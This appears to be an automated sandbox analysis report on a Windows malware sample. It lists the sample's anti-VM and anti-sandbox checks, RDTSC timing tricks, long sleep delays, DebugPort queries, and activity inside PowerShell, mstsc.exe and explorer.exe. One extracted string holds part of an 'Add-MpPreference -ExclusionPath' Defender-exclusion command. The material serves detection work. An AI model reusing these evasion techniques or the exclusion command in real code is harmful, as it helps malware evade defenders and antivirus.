Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3

Show sources

Source: Yara match	File source: 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ms5nQdSz5l.exe PID: 3560, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: SBIEDLL.DLL

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: 0000000000AD98E4 second address: 0000000000AD98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe	RDTSC instruction interceptor: First address: 0000000000AD9B5E second address: 0000000000AD9B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

Code function: 9_2_00409A90 rdtsc

9_2_00409A90

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4675	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3066	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4061	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2755	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4083	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2291	Jump to behavior

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe TID: 396	Thread sleep time: -99418s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe TID: 1688	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 612	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6412	Thread sleep count: 4061 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6580	Thread sleep count: 53 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6700	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6700	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6400	Thread sleep count: 2755 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6536	Thread sleep count: 4083 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6696	Thread sleep count: 63 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6656	Thread sleep time: -24903104499507879s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6540	Thread sleep count: 2291 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5804	Thread sleep time: -30000s >= -30000s

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Thread delayed: delay time: 99418	Jump to behavior
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 0000000B.00000000.345427647.000000000DC20000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Local
Source: powershell.exe, 00000001.00000003.363071692.00000000053AB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.360111569.0000000005297000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.375059377.0000000004D54000.00000004.00000001.sdmp	Binary or memory string: Hyper-V
Source: explorer.exe, 0000000B.00000000.329550509.000000000891C000.00000004.00000001.sdmp	Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000B.00000000.326976586.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: VMWARE
Source: explorer.exe, 0000000B.00000002.497448506.00000000011B3000.00000004.00000020.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 0000000B.00000000.326976586.0000000008270000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 0000000B.00000000.329940814.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 0000000B.00000000.345427647.000000000DC20000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ocal
Source: explorer.exe, 0000000B.00000000.262710030.0000000003710000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: vmware
Source: explorer.exe, 0000000B.00000002.510154790.0000000003755000.00000004.00000001.sdmp	Binary or memory string: ;;SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000B.00000000.345427647.000000000DC20000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}gesB
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000B.00000002.510154790.0000000003755000.00000004.00000001.sdmp	Binary or memory string: AASCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 0000000B.00000000.345427647.000000000DC20000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
Source: Ms5nQdSz5l.exe, 00000000.00000002.244848699.00000000030F4000.00000004.00000001.sdmp	Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: explorer.exe, 0000000B.00000000.329940814.00000000089B5000.00000004.00000001.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 0000000B.00000000.292794369.00000000053C4000.00000004.00000001.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 0000000B.00000000.326976586.0000000008270000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 0000000B.00000000.345427647.000000000DC20000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}AppData
Source: powershell.exe, 00000001.00000003.363071692.00000000053AB000.00000004.00000001.sdmp, powershell.exe, 00000003.00000003.360111569.0000000005297000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.375059377.0000000004D54000.00000004.00000001.sdmp	Binary or memory string: l:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: explorer.exe, 0000000B.00000000.326976586.0000000008270000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\mstsc.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

Code function: 9_2_00409A90 rdtsc

9_2_00409A90

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe

Code function: 9_2_0040ACD0 LdrLoadDll,

9_2_0040ACD0

Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F9100 mov eax, dword ptr fs:[00000030h]	9_2_010F9100
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F9100 mov eax, dword ptr fs:[00000030h]	9_2_010F9100
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F9100 mov eax, dword ptr fs:[00000030h]	9_2_010F9100
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112513A mov eax, dword ptr fs:[00000030h]	9_2_0112513A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112513A mov eax, dword ptr fs:[00000030h]	9_2_0112513A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01114120 mov eax, dword ptr fs:[00000030h]	9_2_01114120
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01114120 mov eax, dword ptr fs:[00000030h]	9_2_01114120
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01114120 mov eax, dword ptr fs:[00000030h]	9_2_01114120
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01114120 mov eax, dword ptr fs:[00000030h]	9_2_01114120
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01114120 mov ecx, dword ptr fs:[00000030h]	9_2_01114120
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0111B944 mov eax, dword ptr fs:[00000030h]	9_2_0111B944
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0111B944 mov eax, dword ptr fs:[00000030h]	9_2_0111B944
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FC962 mov eax, dword ptr fs:[00000030h]	9_2_010FC962
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FB171 mov eax, dword ptr fs:[00000030h]	9_2_010FB171
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FB171 mov eax, dword ptr fs:[00000030h]	9_2_010FB171
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01122990 mov eax, dword ptr fs:[00000030h]	9_2_01122990
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0111C182 mov eax, dword ptr fs:[00000030h]	9_2_0111C182
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112A185 mov eax, dword ptr fs:[00000030h]	9_2_0112A185
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011751BE mov eax, dword ptr fs:[00000030h]	9_2_011751BE
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011751BE mov eax, dword ptr fs:[00000030h]	9_2_011751BE
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011751BE mov eax, dword ptr fs:[00000030h]	9_2_011751BE
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011751BE mov eax, dword ptr fs:[00000030h]	9_2_011751BE
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011769A6 mov eax, dword ptr fs:[00000030h]	9_2_011769A6
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011261A0 mov eax, dword ptr fs:[00000030h]	9_2_011261A0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011261A0 mov eax, dword ptr fs:[00000030h]	9_2_011261A0
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FB1E1 mov eax, dword ptr fs:[00000030h]	9_2_010FB1E1
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FB1E1 mov eax, dword ptr fs:[00000030h]	9_2_010FB1E1
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010FB1E1 mov eax, dword ptr fs:[00000030h]	9_2_010FB1E1
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011841E8 mov eax, dword ptr fs:[00000030h]	9_2_011841E8
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01177016 mov eax, dword ptr fs:[00000030h]	9_2_01177016
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01177016 mov eax, dword ptr fs:[00000030h]	9_2_01177016
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01177016 mov eax, dword ptr fs:[00000030h]	9_2_01177016
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C4015 mov eax, dword ptr fs:[00000030h]	9_2_011C4015
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C4015 mov eax, dword ptr fs:[00000030h]	9_2_011C4015
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0110B02A mov eax, dword ptr fs:[00000030h]	9_2_0110B02A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0110B02A mov eax, dword ptr fs:[00000030h]	9_2_0110B02A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0110B02A mov eax, dword ptr fs:[00000030h]	9_2_0110B02A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0110B02A mov eax, dword ptr fs:[00000030h]	9_2_0110B02A
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112002D mov eax, dword ptr fs:[00000030h]	9_2_0112002D
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112002D mov eax, dword ptr fs:[00000030h]	9_2_0112002D
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112002D mov eax, dword ptr fs:[00000030h]	9_2_0112002D
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112002D mov eax, dword ptr fs:[00000030h]	9_2_0112002D
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112002D mov eax, dword ptr fs:[00000030h]	9_2_0112002D
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01110050 mov eax, dword ptr fs:[00000030h]	9_2_01110050
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01110050 mov eax, dword ptr fs:[00000030h]	9_2_01110050
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011B2073 mov eax, dword ptr fs:[00000030h]	9_2_011B2073
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_011C1074 mov eax, dword ptr fs:[00000030h]	9_2_011C1074
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_010F9080 mov eax, dword ptr fs:[00000030h]	9_2_010F9080
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01173884 mov eax, dword ptr fs:[00000030h]	9_2_01173884
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_01173884 mov eax, dword ptr fs:[00000030h]	9_2_01173884
Source: C:\Users\user\Desktop\Ms5nQdSz5l.exe	Code function: 9_2_0112F0BF mov ecx, dword ptr fs:[00000030h]	9_2_0112F0BF
